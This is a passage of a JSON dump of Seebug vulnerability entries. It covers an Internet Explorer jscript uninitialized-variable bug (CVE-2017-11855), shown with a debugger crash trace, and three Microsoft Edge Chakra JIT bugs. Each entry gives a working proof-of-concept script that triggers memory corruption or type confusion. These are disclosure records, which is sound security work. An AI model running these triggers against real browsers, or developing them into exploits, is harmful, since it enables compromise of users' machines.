ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\njscript!InvokeDispatch+0xbd:\r\n00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????\r\n\r\n0:014> k\r\n # Child-SP RetAddr Call Site\r\n00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd\r\n01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f\r\n02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51\r\n03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f\r\n04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a\r\n05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135\r\n06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87\r\n07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0\r\n08 000000f4`2f0fb780 00007ffa`e458b015 
jscript!NatFncObj::Call+0x10a\r\n09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135\r\n0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580\r\n0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60\r\n0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb\r\n0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f\r\n0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d\r\n0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8\r\n10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265\r\n11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b\r\n12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239\r\n13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56\r\n14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8\r\n15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d\r\n16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4\r\n17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267\r\n18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf\r\n19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181\r\n1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50\r\n1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a\r\n1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32\r\n1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70\r\n1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1\r\n1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40\r\n20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c\r\n21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251\r\n22 
000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9\r\n23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274\r\n24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac\r\n25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7\r\n26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4\r\n27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16\r\n28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89\r\n29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14\r\n2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21\r\n\r\n0:014> u rip\r\njscript!InvokeDispatch+0xbd:\r\n00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]\r\n00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]\r\n00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]\r\n00007ffa`e45a460c 458bc4 mov r8d,r12d\r\n00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax\r\n00007ffa`e45a4614 488bd7 mov rdx,rdi\r\n00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]\r\n00007ffa`e45a461b 498bce mov rcx,r14\r\n```", "published": "2017-12-20T00:00:00", "type": "seebug", "title": "Windows: Uninitialized variable in jscript!JsArraySlice(CVE-2017-11855)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11855"], "modified": "2017-12-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97006", "id": "SSV:97006", "sourceData": "\n <!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\nvar x = new URIError(new Array(), undefined, undefined);\r\nString.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));\r\nArray.prototype.slice.call(1);\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-97006", "cvss": {"score": 7.6, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T18:27:42", "description": "In the following JavaScript code, both of the print calls must print out \"undefined\" because \"x\" is a formal parameter. But the second print call prints out \"function x() { }\". This bug may lead to type confusion in JITed code.\r\n```\r\nfunction f(x) {\r\n print(x);\r\n\r\n {\r\n function x() {\r\n\r\n }\r\n }\r\n\r\n print(x);\r\n}\r\n```\r\nThe following code in \"PreVisitFunction\" is used to decide how to optimize arguments.\r\n```\r\n bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());\r\n```\r\n\r\n\"HasAnyWriteToFormals\" set by \"Parser::BindPidRefsInScope\" returns true in the following example code where \"x\" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.\r\n```\r\nfunction f(x) {\r\n x = 1;\r\n}\r\n```", "published": "2017-12-04T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: JIT: Incorrect function declaration scope(CVE-2017-11870)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11870"], "modified": "2017-12-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96917", "id": "SSV:96917", "sourceData": "\n function f(x) {\r\n arguments;\r\n\r\n {\r\n function x() {\r\n }\r\n }\r\n}\r\n\r\nfor (let i = 0; i < 10000; i++)\r\n f();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96917", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:56:51", "description": "```\r\nfunction opt(a, b, v) {\r\n if (b.length < 1)\r\n return;\r\n\r\n for (let i = 0; i < a.length; i++)\r\n a[i] = v;\r\n\r\n b[0] = 2.3023e-320;\r\n}\r\n```\r\nThe above JavaScript code is JITed as follows:\r\n```\r\n... 
CHECKING THE TYPE OF B ...\r\nOP_Memset(a, v, a.length);\r\nb[0] = 2.3023e-320;\r\n```\r\nBut there are no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of \"b\" was changed after \"OP_Memset\" was called.\r\n\r\nThe PoC shows that it can result in type confusion.", "published": "2017-11-16T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: JIT: Bailouts must be generated for OP_Memset(CVE-2017-11873)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11873"], "modified": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96872", "id": "SSV:96872", "sourceData": "\n function opt(a, b, v) {\r\n if (b.length < 1)\r\n return;\r\n\r\n for (let i = 0; i < a.length; i++)\r\n a[i] = v;\r\n\r\n b[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n for (let i = 0; i < 1000; i++) {\r\n opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});\r\n }\r\n\r\n let a = new Uint8Array(100);\r\n let b = [1.1, 2.2, 3.3];\r\n opt(a, b, {\r\n valueOf: () => {\r\n b[0] = {};\r\n return 0;\r\n }\r\n });\r\n\r\n print(b[0]);\r\n}\r\n\r\nmain();\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96872", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:28", "description": "Here's a snippet of the method.\r\n```\r\nvoid Lowerer::LowerBoundCheck(IR::Instr *const instr)\r\n{\r\n ...\r\n if(rightOpnd->IsIntConstOpnd())\r\n {\r\n IntConstType newOffset;\r\n if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)\r\n {\r\n offset = newOffset;\r\n rightOpnd = nullptr;\r\n offsetOpnd = nullptr;\r\n }\r\n }\r\n ...\r\n if(!rightOpnd)\r\n {\r\n rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);\r\n }\r\n}\r\n```\r\nAt (a), it uses \"IntConstMath::Add\" to check integer overflow. But the size of IntConstType is equal to the size of a pointer, and the \"offset\" variable is used as a 32-bit integer. 
So it may fail to check integer overflow on a 64-bit system.", "published": "2017-11-16T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: JIT: Incorrect integer overflow check in Lowerer::LowerBoundCheck(CVE-2017-11861)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11861"], "modified": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96873", "id": "SSV:96873", "sourceData": "\n function f() {\r\n let arr = new Uint32Array(0x1000);\r\n for (let i = 0; i < 0x7fffffff;) {\r\n arr[++i] = 0x1234;\r\n }\r\n}\r\n\r\nf();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96873", "cvss": {"score": 0.0, "vector": "NONE"}}]}